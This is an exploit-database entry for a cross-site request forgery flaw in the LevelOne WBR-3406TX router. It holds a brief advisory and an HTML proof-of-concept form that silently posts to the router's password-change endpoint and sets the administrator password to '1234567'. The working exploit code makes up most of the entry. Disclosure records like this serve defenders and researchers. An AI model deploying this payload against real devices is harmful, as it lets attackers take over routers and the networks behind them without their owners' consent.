LevelOne WBR-3406TX Router – Cross-Site Request Forgery

  • 作者: Yakir Wizman
    日期: 2013-11-15
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/38851/
  • source: https://www.securityfocus.com/bid/63908/info

LevelOne WBR-3406TX router is prone to a cross-site request-forgery vulnerability.

Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device.

<html>
<body>
<form action="http://www.example.com/cgi-bin/pass" method="POST">
<input type="hidden" name="rc" value="@" />
<input type="hidden" name="Pa" value="1234567" />
<input type="hidden" name="P1" value="1234567" />
<input type="hidden" name="rd" value="atbox" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
    Python